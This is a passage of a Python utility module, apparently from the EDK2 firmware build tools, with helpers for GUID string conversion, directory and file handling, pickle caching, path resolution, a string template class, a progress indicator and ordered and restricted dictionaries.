        return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
            int(guidValueList[3], 16),
            int(guidValueList[2], 16),
            int(guidValueList[1], 16),
            int(guidValueList[0], 16),
            int(guidValueList[5], 16),
            int(guidValueList[4], 16),
            int(guidValueList[7], 16),
            int(guidValueList[6], 16),
            int(guidValueList[8], 16),
            int(guidValueList[9], 16),
            int(guidValueList[10], 16),
            int(guidValueList[11], 16),
            int(guidValueList[12], 16),
            int(guidValueList[13], 16),
            int(guidValueList[14], 16),
            int(guidValueList[15], 16)
            )
    except ValueError:
        # A non-hex byte value: report failure the same way as a bad length.
        return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
#   @param      GuidValue   The GUID value in C structure format
#
#   @retval     string      The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format,
#                           or '' if the input is malformed
#
def GuidStructureStringToGuidString(GuidValue):
    guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
    guidValueList = guidValueString.split(",")
    # A C-structure GUID flattens to exactly 11 numbers:
    # Data1, Data2, Data3 and the 8 bytes of Data4.
    if len(guidValueList) != 11:
        return ''
    try:
        return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
            int(guidValueList[0], 16),
            int(guidValueList[1], 16),
            int(guidValueList[2], 16),
            int(guidValueList[3], 16),
            int(guidValueList[4], 16),
            int(guidValueList[5], 16),
            int(guidValueList[6], 16),
            int(guidValueList[7], 16),
            int(guidValueList[8], 16),
            int(guidValueList[9], 16),
            int(guidValueList[10], 16)
            )
    except ValueError:
        # A non-hex field: report failure the same way as a bad length.
        return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
#   @param      GuidValue   The GUID value in C structure format
#
#   @retval     string      The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
    Stripped = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
    Fields = Stripped.split(",")
    # A C-structure GUID flattens to exactly 11 numbers.
    if len(Fields) != 11:
        EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
    Numbers = [int(Field, 16) for Field in Fields]
    return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % tuple(Numbers)
## Create directories
#
#   @param      Directory   The directory name (may be nested)
#
#   @retval     True        If the directory exists or was created
#   @retval     False       If creation failed
#
def CreateDirectory(Directory):
    # None/blank means "nothing to create" and is treated as success.
    if Directory is None or Directory.strip() == "":
        return True
    try:
        if not os.access(Directory, os.F_OK):
            os.makedirs(Directory)
    except OSError:
        # Permission problem or creation race.
        return False
    return True
## Remove directories, including files and sub-directories in it
#
#   @param      Directory       The directory name
#   @param      Recursively     Also delete the directory's contents
#
def RemoveDirectory(Directory, Recursively=False):
    if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
        return
    if Recursively:
        CurrentDirectory = os.getcwd()
        os.chdir(Directory)
        try:
            for File in os.listdir("."):
                if os.path.isdir(File):
                    RemoveDirectory(File, Recursively)
                else:
                    os.remove(File)
        finally:
            # Always restore the working directory, even when a removal
            # fails -- the original could leave the process chdir'd away.
            os.chdir(CurrentDirectory)
    os.rmdir(Directory)
## Check if given file is changed or not
#
#  Compare the file's current timestamp against the cached one and refresh
#  the cache with the latest value.
#
#   @param      File    The path of file
#
#   @retval True        If the given file is changed, doesn't exist, or can't be
#                       found in timestamp cache
#   @retval False       If the given file is unchanged since last check
#
def IsChanged(File):
    if not os.path.exists(File):
        return True

    TimeStamp = os.stat(File)[-2]    # index -2 of the stat tuple is st_mtime
    Unchanged = File in gFileTimeStampCache and TimeStamp == gFileTimeStampCache[File]
    # Refresh the cache (writes the same value back when unchanged).
    gFileTimeStampCache[File] = TimeStamp
    return not Unchanged
## Store content in file
#
#  This method is used to save file only when its content is changed. This is
#  quite useful for "make" system to decide what will be re-built and what won't.
#
#   @param      File            The path of file
#   @param      Content         The new content of the file
#   @param      IsBinaryFile    The flag indicating if the file is binary file or not
#
#   @retval     True            If the file content is changed and the file is renewed
#   @retval     False           If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
    if not IsBinaryFile:
        # Text content is stored with the platform's native line separator.
        Content = Content.replace("\n", os.linesep)

    if os.path.exists(File):
        try:
            # 'with' closes the handle; the original leaked it on every call.
            with open(File, "rb") as Fd:
                if Content == Fd.read():
                    return False
        except:
            EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)

    DirName = os.path.dirname(File)
    if not CreateDirectory(DirName):
        EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
    else:
        if DirName == '':
            DirName = os.getcwd()
        if not os.access(DirName, os.W_OK):
            EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)

    try:
        if GlobalData.gIsWindows:
            try:
                # PyUtility is an optional native helper for long-path writes.
                from PyUtility import SaveFileToDisk
                if not SaveFileToDisk(File, Content):
                    EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData=File)
            except:
                # Fall back to a normal Python write.
                with open(File, "wb") as Fd:
                    Fd.write(Content)
        else:
            with open(File, "wb") as Fd:
                Fd.write(Content)
    except IOError as X:
        # 'except IOError, X' was Python-2-only syntax; 'as' works on 2.6+.
        EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)

    return True
## Make a Python object persistent on file system
#
#   @param      Data    The object to be stored in file
#   @param      File    The path of file to store the object
#
def DataDump(Data, File):
    try:
        # 'with' guarantees the handle is closed on every path, replacing the
        # manual Fd/finally bookkeeping and the '!= None' check.
        with open(File, 'wb') as Fd:
            cPickle.dump(Data, Fd, cPickle.HIGHEST_PROTOCOL)
    except:
        EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
## Restore a Python object from a file
#
#   @param      File    The path of file stored the object
#
#   @retval     object  A python object
#   @retval     None    If failure in file operation
#
def DataRestore(File):
    Data = None
    try:
        # 'with' replaces the manual Fd/finally bookkeeping.
        with open(File, 'rb') as Fd:
            Data = cPickle.load(Fd)
    except Exception as e:
        # 'except Exception, e' was Python-2-only syntax; 'as' works on 2.6+.
        EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
        Data = None
    return Data
## Retrieve and cache the real path name in file system
#
#   @param      Root   The root directory of path relative to
#
#   @retval     str    The path string if the path exists
#   @retval     None   If path doesn't exist
#
class DirCache:
    def __init__(self, Root):
        self._Root = Root
        # Bug fix: these were CLASS attributes, so every DirCache instance
        # shared one cache and entries from different roots were mixed
        # together.  They are now per-instance.
        self._CACHE_ = set()
        self._UPPER_CACHE_ = {}
        for F in os.listdir(Root):
            self._CACHE_.add(F)
            self._UPPER_CACHE_[F.upper()] = F

    # =[] operator: look up 'Path' (absolute or root-relative) and return
    # the case-correct on-disk path, or None if it does not exist.
    def __getitem__(self, Path):
        Path = Path[len(os.path.commonprefix([Path, self._Root])):]
        if not Path:
            return self._Root
        if Path and Path[0] == os.path.sep:
            Path = Path[1:]
        # Fast path: exact or case-insensitive hit in the cache.
        if Path in self._CACHE_:
            return os.path.join(self._Root, Path)
        UpperPath = Path.upper()
        if UpperPath in self._UPPER_CACHE_:
            return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])

        # Walk down the path components to find the deepest cached parent.
        IndexList = []
        LastSepIndex = -1
        SepIndex = Path.find(os.path.sep)
        while SepIndex > -1:
            Parent = UpperPath[:SepIndex]
            if Parent not in self._UPPER_CACHE_:
                break
            LastSepIndex = SepIndex
            SepIndex = Path.find(os.path.sep, LastSepIndex + 1)

        if LastSepIndex == -1:
            return None

        # Populate the cache with directory listings along the path, then
        # retry the lookup.
        Cwd = os.getcwd()
        os.chdir(self._Root)
        SepIndex = LastSepIndex
        while SepIndex > -1:
            Parent = Path[:SepIndex]
            ParentKey = UpperPath[:SepIndex]
            if ParentKey not in self._UPPER_CACHE_:
                os.chdir(Cwd)
                return None

            if Parent in self._CACHE_:
                ParentDir = Parent
            else:
                ParentDir = self._UPPER_CACHE_[ParentKey]
            for F in os.listdir(ParentDir):
                Dir = os.path.join(ParentDir, F)
                self._CACHE_.add(Dir)
                self._UPPER_CACHE_[Dir.upper()] = Dir

            SepIndex = Path.find(os.path.sep, SepIndex + 1)

        os.chdir(Cwd)
        if Path in self._CACHE_:
            return os.path.join(self._Root, Path)
        elif UpperPath in self._UPPER_CACHE_:
            return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
        return None
## Get all files of a directory
#
# @param Root:       Root dir
# @param SkipList :  Directory names to prune from the walk
# @param FullPath:   Return absolute paths (True) or paths relative to Root
#
# @retval A list of all files
#
def GetFiles(Root, SkipList=None, FullPath=True):
    RootDir = Root
    Result = []
    for Dirpath, Dirnames, Filenames in os.walk(RootDir):
        if SkipList:
            # Prune skipped directories in place so os.walk won't descend.
            Dirnames[:] = [D for D in Dirnames if D not in SkipList]
        for Name in Filenames:
            Full = os.path.normpath(os.path.join(Dirpath, Name))
            Result.append(Full if FullPath else Full[len(RootDir) + 1:])
    return Result
## Check if given file exists or not
#
#   @param      File    File name or path to be checked
#   @param      Ext     Expected file extension (case-insensitive), or None
#
#   @retval True  if file exists (and matches Ext when given)
#   @retval False if file doesn't exist or the extension differs
#
def ValidFile(File, Ext=None):
    if Ext is not None:
        # Extension comparison is case-insensitive ('.INF' == '.inf').
        FileExt = os.path.splitext(File)[1]
        if FileExt.lower() != Ext.lower():
            return False
    return os.path.exists(File)
def RealPath(File, Dir='', OverrideDir=''):
    """Resolve File against Dir via the GlobalData.gAllFiles cache; when not
    found there and an OverrideDir is given, try the override location."""
    Candidate = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
    if not Candidate and OverrideDir:
        Candidate = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
    return Candidate
def RealPath2(File, Dir='', OverrideDir=''):
    """Resolve File against OverrideDir first, then Dir, using the
    GlobalData.gAllFiles cache; falls back to the file system when the cache
    is empty.

    @retval (relative path, base directory) on success, (None, None) otherwise
    """
    NewFile = None
    if OverrideDir:
        NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
        if NewFile:
            # Split the match back into (path relative to OverrideDir, OverrideDir);
            # the +1 skips the separator when OverrideDir has no trailing sep.
            if OverrideDir[-1] == os.path.sep:
                return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
            else:
                return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
    if GlobalData.gAllFiles:
        NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
    if not NewFile:
        # Cache miss (or empty cache): check the file system directly.
        NewFile = os.path.normpath(os.path.join(Dir, File))
        if not os.path.exists(NewFile):
            return None, None
    if NewFile:
        if Dir:
            if Dir[-1] == os.path.sep:
                return NewFile[len(Dir):], NewFile[0:len(Dir)]
            else:
                return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
        else:
            return NewFile, ''
    return None, None
## Check if given file exists or not
#
#
def ValidFile2(AllFiles, File, Ext=None, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
    """Locate File through the AllFiles cache, expanding the legacy
    $(EFI_SOURCE)/$(EDK_SOURCE) macros, and checking (1) the file's own
    macro-expanded path, (2) OverrideDir, (3) Dir in that order.

    @retval (True, resolved path) on success, (False, last tried path) otherwise
    """
    NewFile = File
    if Ext != None:
        # Extension comparison is case-insensitive.
        Dummy, FileExt = os.path.splitext(File)
        if FileExt.lower() != Ext.lower():
            return False, File

    # Replace the Edk macros
    if OverrideDir != '' and OverrideDir != None:
        if OverrideDir.find('$(EFI_SOURCE)') > -1:
            OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
        if OverrideDir.find('$(EDK_SOURCE)') > -1:
            OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)

    # Replace the default dir to current dir
    if Dir == '.':
        Dir = os.getcwd()
        # Make Dir workspace-relative, as AllFiles keys are.
        Dir = Dir[len(Workspace) + 1:]

    # First check if File has Edk definition itself
    if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
        NewFile = File.replace('$(EFI_SOURCE)', EfiSource)
        NewFile = NewFile.replace('$(EDK_SOURCE)', EdkSource)
        NewFile = AllFiles[os.path.normpath(NewFile)]
        if NewFile != None:
            return True, NewFile

    # Second check the path with override value
    if OverrideDir != '' and OverrideDir != None:
        NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
        if NewFile != None:
            return True, NewFile

    # Last check the path with normal definitions
    File = os.path.join(Dir, File)
    NewFile = AllFiles[os.path.normpath(File)]
    if NewFile != None:
        return True, NewFile

    return False, File
## Check if given file exists or not
#
#
def ValidFile3(AllFiles, File, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
    """Like ValidFile2, but also reports which base directory the file was
    resolved against.

    @retval (NewRelaPath, RelaPath, File) -- the resolved base directory,
            the original module directory, and the (possibly rewritten)
            file name
    """
    # Replace the Edk macros
    if OverrideDir != '' and OverrideDir != None:
        if OverrideDir.find('$(EFI_SOURCE)') > -1:
            OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
        if OverrideDir.find('$(EDK_SOURCE)') > -1:
            OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)

    # Replace the default dir to current dir
    # Dir is current module dir related to workspace
    if Dir == '.':
        Dir = os.getcwd()
        Dir = Dir[len(Workspace) + 1:]

    NewFile = File
    RelaPath = AllFiles[os.path.normpath(Dir)]
    NewRelaPath = RelaPath

    # The while(True) is a single-pass "goto end" construct: each candidate
    # location breaks out as soon as it resolves.
    while(True):
        # First check if File has Edk definition itself
        if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
            File = File.replace('$(EFI_SOURCE)', EfiSource)
            File = File.replace('$(EDK_SOURCE)', EdkSource)
            NewFile = AllFiles[os.path.normpath(File)]
            if NewFile != None:
                NewRelaPath = os.path.dirname(NewFile)
                File = os.path.basename(NewFile)
                #NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
                break

        # Second check the path with override value
        if OverrideDir != '' and OverrideDir != None:
            NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
            if NewFile != None:
                #NewRelaPath = os.path.dirname(NewFile)
                # Strip the file part (with any ../ prefixes removed) to
                # recover the base directory of the match.
                NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
                break

        # Last check the path with normal definitions
        NewFile = AllFiles[os.path.normpath(os.path.join(Dir, File))]
        if NewFile != None:
            break

        # No file found
        break

    return NewRelaPath, RelaPath, File
def GetRelPath(Path1, Path2):
    """Compute the path of file Path2 relative to directory Path1.

    @param  Path1   Base directory
    @param  Path2   Target file path

    @retval Normalized relative path from Path1 to Path2
    """
    Sep = os.path.normpath('/')
    L1 = os.path.normpath(Path1).split(Sep)
    L2 = os.path.normpath(Path2).split(Sep)
    # Length of the common component prefix.  The original loop indexed L2
    # with L1's range, raising IndexError when Path2 had fewer components.
    Common = 0
    while Common < len(L1) and Common < len(L2) and L1[Common] == L2[Common]:
        Common += 1
    if Common == len(L1):
        # Path1 is a prefix of Path2: no '../' hops are needed.  The
        # original returned only the basename here, losing intermediate
        # directories (e.g. ('/a/b', '/a/b/c/f.txt') gave 'f.txt').
        Remainder = L2[Common:]
        if not Remainder:
            return os.path.normpath(os.path.basename(Path2))
        FileName = Remainder[0]
        for Part in Remainder[1:]:
            FileName = os.path.join(FileName, Part)
        return os.path.normpath(FileName)
    # Go up one level per remaining Path1 component, then down into Path2.
    FileName = '../' * (len(L1) - Common)
    for Part in L2[Common:]:
        FileName = os.path.join(FileName, Part)
    return os.path.normpath(FileName)
## Get GUID value from given packages
#
#   @param      CName           The CName of the GUID
#   @param      PackageList     List of packages looking-up in
#   @param      Inffile         The driver file
#
#   @retval     GuidValue   if the CName is found in any given package
#   @retval     None        if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
    for Package in PackageList:
        Visible = Package.Guids.keys()
        # Private GUIDs are hidden from INFs that live outside the
        # declaring package's directory.
        if Inffile and Package._PrivateGuids and not Inffile.startswith(Package.MetaFile.Dir):
            Visible = [GuidName for GuidName in Package.Guids if GuidName not in Package._PrivateGuids]
        if CName in Visible:
            return Package.Guids[CName]
    return None
## Get Protocol value from given packages
#
#   @param      CName           The CName of the protocol GUID
#   @param      PackageList     List of packages looking-up in
#   @param      Inffile         The driver file
#
#   @retval     GuidValue   if the CName is found in any given package
#   @retval     None        if the CName is not found in all given packages
#
def ProtocolValue(CName, PackageList, Inffile = None):
    for Package in PackageList:
        Visible = Package.Protocols.keys()
        # Private protocols are hidden from INFs that live outside the
        # declaring package's directory.
        if Inffile and Package._PrivateProtocols and not Inffile.startswith(Package.MetaFile.Dir):
            Visible = [Name for Name in Package.Protocols if Name not in Package._PrivateProtocols]
        if CName in Visible:
            return Package.Protocols[CName]
    return None
## Get PPI value from given packages
#
#   @param      CName           The CName of the PPI GUID
#   @param      PackageList     List of packages looking-up in
#   @param      Inffile         The driver file
#
#   @retval     GuidValue   if the CName is found in any given package
#   @retval     None        if the CName is not found in all given packages
#
def PpiValue(CName, PackageList, Inffile = None):
    for Package in PackageList:
        Visible = Package.Ppis.keys()
        # Private PPIs are hidden from INFs that live outside the
        # declaring package's directory.
        if Inffile and Package._PrivatePpis and not Inffile.startswith(Package.MetaFile.Dir):
            Visible = [Name for Name in Package.Ppis if Name not in Package._PrivatePpis]
        if CName in Visible:
            return Package.Ppis[CName]
    return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
    """A string template.

    A template contains ${placeholder} markers, optionally grouped between
    ${BEGIN} and ${END}.  When instantiated, a grouped (repeatable) section
    is emitted once per element if the placeholder value supplied is a
    list/set/tuple; a scalar value is substituted exactly once.
    """
    # Marker names (the group(1) text of a placeholder match) that open and
    # close a repeatable section.
    _REPEAT_START_FLAG = "BEGIN"
    _REPEAT_END_FLAG = "END"
    class Section(object):
        """One parsed section: literal text fragments interleaved with
        "${name}" fragments, instantiated (and possibly repeated) as a unit."""
        # Placeholder value types that trigger repetition of the section.
        _LIST_TYPES = [type([]), type(set()), type((0,))]
        def __init__(self, TemplateSection, PlaceHolderList):
            self._Template = TemplateSection
            self._PlaceHolderList = []
            # Split the section into sub-sections according to the position of placeholders
            if PlaceHolderList:
                self._SubSectionList = []
                SubSectionStart = 0
                #
                # The placeholders passed in must be in the format of
                #
                #   PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
                #
                # (offsets are relative to TemplateSection)
                #
                for PlaceHolder, Start, End in PlaceHolderList:
                    # Literal text up to the placeholder, then the "${name}"
                    # fragment itself as its own sub-section.
                    self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
                    self._SubSectionList.append(TemplateSection[Start:End])
                    self._PlaceHolderList.append(PlaceHolder)
                    SubSectionStart = End
                # Trailing literal text after the last placeholder, if any.
                if SubSectionStart < len(TemplateSection):
                    self._SubSectionList.append(TemplateSection[SubSectionStart:])
            else:
                self._SubSectionList = [TemplateSection]
        def __str__(self):
            return self._Template + " : " + str(self._PlaceHolderList)
        def Instantiate(self, PlaceHolderValues):
            """Fill in this section's placeholders from PlaceHolderValues.

            List/set/tuple values repeat the whole section element-wise; all
            such values within one section must have the same length (a
            mismatch is reported via EdkLogger.error).  Scalar values are
            substituted once.  Placeholders with no supplied value are left
            in the output verbatim.
            """
            RepeatTime = -1
            RepeatPlaceHolders = {}
            NonRepeatPlaceHolders = {}
            for PlaceHolder in self._PlaceHolderList:
                if PlaceHolder not in PlaceHolderValues:
                    continue
                Value = PlaceHolderValues[PlaceHolder]
                if type(Value) in self._LIST_TYPES:
                    if RepeatTime < 0:
                        RepeatTime = len(Value)
                    elif RepeatTime != len(Value):
                        EdkLogger.error(
                                    "TemplateString",
                                    PARAMETER_INVALID,
                                    "${%s} has different repeat time from others!" % PlaceHolder,
                                    ExtraData=str(self._Template)
                                    )
                    RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
                else:
                    NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
            # First pass: substitute all scalar placeholders in place.
            if NonRepeatPlaceHolders:
                StringList = []
                for S in self._SubSectionList:
                    if S not in NonRepeatPlaceHolders:
                        StringList.append(S)
                    else:
                        StringList.append(str(NonRepeatPlaceHolders[S]))
            else:
                StringList = self._SubSectionList
            # Second pass: expand the section RepeatTime times, indexing each
            # list-valued placeholder by the repetition counter.
            if RepeatPlaceHolders:
                TempStringList = []
                for Index in range(RepeatTime):
                    for S in StringList:
                        if S not in RepeatPlaceHolders:
                            TempStringList.append(S)
                        else:
                            TempStringList.append(str(RepeatPlaceHolders[S][Index]))
                StringList = TempStringList
            return "".join(StringList)
    ## Constructor
    #
    # @param Template   Optional template text parsed immediately into sections
    #
    def __init__(self, Template=None):
        self.String = ''
        self.IsBinary = False
        self._Template = Template
        self._TemplateSectionList = self._Parse(Template)
    ## str() operator
    #
    # @retval string The string replaced
    #
    def __str__(self):
        return self.String
    ## Split the template string into fragments per the ${BEGIN} and ${END} flags
    #
    # @retval list A list of TemplateString.Section objects
    #
    def _Parse(self, Template):
        SectionStart = 0
        SearchFrom = 0
        MatchEnd = 0
        PlaceHolderList = []
        TemplateSectionList = []
        while Template:
            # gPlaceholderPattern is a module-level regex whose group(1) is
            # the placeholder name inside "${...}".
            MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
            if not MatchObj:
                # No more placeholders: the remainder forms the final section.
                if MatchEnd <= len(Template):
                    TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
                    TemplateSectionList.append(TemplateSection)
                break
            MatchString = MatchObj.group(1)
            MatchStart = MatchObj.start()
            MatchEnd = MatchObj.end()
            if MatchString == self._REPEAT_START_FLAG:
                # ${BEGIN}: close any preceding section, then start fresh.
                if MatchStart > SectionStart:
                    TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
                    TemplateSectionList.append(TemplateSection)
                SectionStart = MatchEnd
                PlaceHolderList = []
            elif MatchString == self._REPEAT_END_FLAG:
                # ${END}: the repeatable section body ends just before the marker.
                TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
                TemplateSectionList.append(TemplateSection)
                SectionStart = MatchEnd
                PlaceHolderList = []
            else:
                # Ordinary ${name}: record it with offsets relative to the
                # current section start.
                PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
            SearchFrom = MatchEnd
        return TemplateSectionList
    ## Replace the string template with dictionary of placeholders and append it to previous one
    #
    # @param AppendString   The string template to append
    # @param Dictionary     The placeholder dictionaries
    #
    def Append(self, AppendString, Dictionary=None):
        if Dictionary:
            SectionList = self._Parse(AppendString)
            self.String += "".join([S.Instantiate(Dictionary) for S in SectionList])
        else:
            self.String += AppendString
    ## Replace the string template with dictionary of placeholders
    #
    # @param Dictionary     The placeholder dictionaries
    #
    # @retval str           The string replaced with placeholder values
    #
    def Replace(self, Dictionary=None):
        return "".join([S.Instantiate(Dictionary) for S in self._TemplateSectionList])
## Progress indicator class
#
# Prints a progress character on the console from a background thread until
# stopped.  The stop event and worker thread are shared at class level, so at
# most one progress thread exists at a time.
#
class Progressor:
    # Shared stop event; also guards against a dead loop in the worker.
    _StopFlag = None
    # The single shared worker thread (None when no progress is running).
    _ProgressThread = None
    # Seconds between stop-flag checks; short so Stop() stays responsive.
    _CheckInterval = 0.25
    ## Constructor
    #
    # @param OpenMessage    The string printed before progress characters
    # @param CloseMessage   The string printed after progress characters
    # @param ProgressChar   The character used to indicate progress
    # @param Interval       Seconds between two progress characters
    #
    def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
        self.PromptMessage = OpenMessage
        self.CodaMessage = CloseMessage
        self.ProgressChar = ProgressChar
        self.Interval = Interval
        if Progressor._StopFlag is None:
            Progressor._StopFlag = threading.Event()
    ## Start printing progress characters
    #
    # @param OpenMessage    Optional replacement for the prompt message
    #
    def Start(self, OpenMessage=None):
        if OpenMessage is not None:
            self.PromptMessage = OpenMessage
        Progressor._StopFlag.clear()
        if Progressor._ProgressThread is None:
            Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
            Progressor._ProgressThread.setDaemon(False)
            Progressor._ProgressThread.start()
    ## Stop printing progress characters
    #
    # @param CloseMessage   Optional one-shot replacement for the coda message
    #
    def Stop(self, CloseMessage=None):
        SavedCoda = self.CodaMessage
        if CloseMessage is not None:
            self.CodaMessage = CloseMessage
        self.Abort()
        # Restore the configured coda so the override is one-shot.
        self.CodaMessage = SavedCoda
    ## Thread entry method: emits one ProgressChar per Interval until stopped
    def _ProgressThreadEntry(self):
        sys.stdout.write(self.PromptMessage + " ")
        sys.stdout.flush()
        Remaining = 0.0
        while not Progressor._StopFlag.isSet():
            if Remaining <= 0.0:
                sys.stdout.write(self.ProgressChar)
                sys.stdout.flush()
                Remaining = self.Interval
            time.sleep(self._CheckInterval)
            Remaining -= self._CheckInterval
        sys.stdout.write(" " + self.CodaMessage + "\n")
        sys.stdout.flush()
    ## Signal the worker thread to stop and wait for it to exit
    @staticmethod
    def Abort():
        if Progressor._StopFlag is not None:
            Progressor._StopFlag.set()
        if Progressor._ProgressThread is not None:
            Progressor._ProgressThread.join()
            Progressor._ProgressThread = None
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict whose keys and values can be
# accessed in the order they were added.  The order is guaranteed by an
# internal list holding a copy of the keys.
#
class sdict(IterableUserDict):
    ## Constructor
    def __init__(self):
        IterableUserDict.__init__(self)
        # Insertion-ordered key list: the single source of truth for ordering.
        self._key_list = []
    ## [] operator
    def __setitem__(self, key, value):
        if key not in self._key_list:
            self._key_list.append(key)
        IterableUserDict.__setitem__(self, key, value)
    ## del operator
    def __delitem__(self, key):
        self._key_list.remove(key)
        IterableUserDict.__delitem__(self, key)
    ## used in "for k in dict" loop to ensure the correct order
    def __iter__(self):
        return self.iterkeys()
    ## len() support
    def __len__(self):
        return len(self._key_list)
    ## "in" test support
    def __contains__(self, key):
        return key in self._key_list
    ## indexof support
    def index(self, key):
        return self._key_list.index(key)
    ## insert support: place newkey/newvalue 'BEFORE' or 'AFTER' existing key
    def insert(self, key, newkey, newvalue, order):
        index = self._key_list.index(key)
        if order == 'BEFORE':
            self._key_list.insert(index, newkey)
            IterableUserDict.__setitem__(self, newkey, newvalue)
        elif order == 'AFTER':
            self._key_list.insert(index + 1, newkey)
            IterableUserDict.__setitem__(self, newkey, newvalue)
    ## append support: merge another sdict, preserving its iteration order
    def append(self, sdict):
        for key in sdict:
            if key not in self._key_list:
                self._key_list.append(key)
            IterableUserDict.__setitem__(self, key, sdict[key])
    def has_key(self, key):
        return key in self._key_list
    ## Empty the dict
    def clear(self):
        self._key_list = []
        IterableUserDict.clear(self)
    ## Return a copy of keys (in insertion order)
    def keys(self):
        return list(self._key_list)
    ## Return a copy of values (in key insertion order)
    def values(self):
        return [self[key] for key in self._key_list]
    ## Return a copy of (key, value) list (in key insertion order)
    def items(self):
        return [(key, self[key]) for key in self._key_list]
    ## Iteration support
    def iteritems(self):
        return iter(self.items())
    ## Keys iteration support
    def iterkeys(self):
        return iter(self.keys())
    ## Values iteration support
    def itervalues(self):
        return iter(self.values())
    ## Return value related to a key, and remove the (key, value) from the dict
    def pop(self, key, *dv):
        value = None
        if key in self._key_list:
            value = self[key]
            self.__delitem__(key)
        elif len(dv) != 0:
            # Bug fix: this used to read the undefined name 'kv', raising
            # NameError whenever pop() was called with a default for a
            # missing key; the intended source is the 'dv' varargs tuple.
            value = dv[0]
        return value
    ## Return (key, value) pair of the most recently added key, and remove it
    def popitem(self):
        key = self._key_list[-1]
        value = self[key]
        self.__delitem__(key)
        return key, value
    ## Merge a mapping and/or keyword values into this dict
    def update(self, dict=None, **kwargs):
        if dict is not None:
            for k, v in dict.items():
                self[k] = v
        if len(kwargs):
            for k, v in kwargs.items():
                self[k] = v
## Dictionary with restricted keys
#
# The set of legal keys is fixed at construction time and every legal key
# starts out mapped to "".  Assigning an unknown key, or removing entries in
# any way, is reported through EdkLogger.error; reading an unknown key simply
# yields the empty string.
#
class rdict(dict):
    ## Constructor: register every allowed key with an empty-string value
    def __init__(self, KeyList):
        for LegalKey in KeyList:
            dict.__setitem__(self, LegalKey, "")
    ## []= operator: only pre-registered keys may be assigned
    def __setitem__(self, key, value):
        if key not in self:
            EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
                            ExtraData=", ".join(dict.keys(self)))
        dict.__setitem__(self, key, value)
    ## =[] operator: unknown keys read as "" instead of raising KeyError
    def __getitem__(self, key):
        return dict.__getitem__(self, key) if key in self else ""
    ## del operator: removal is forbidden
    def __delitem__(self, key):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
    ## Empty the dict: every key is reset to "", none is removed
    def clear(self):
        for Key in self:
            self.__setitem__(Key, "")
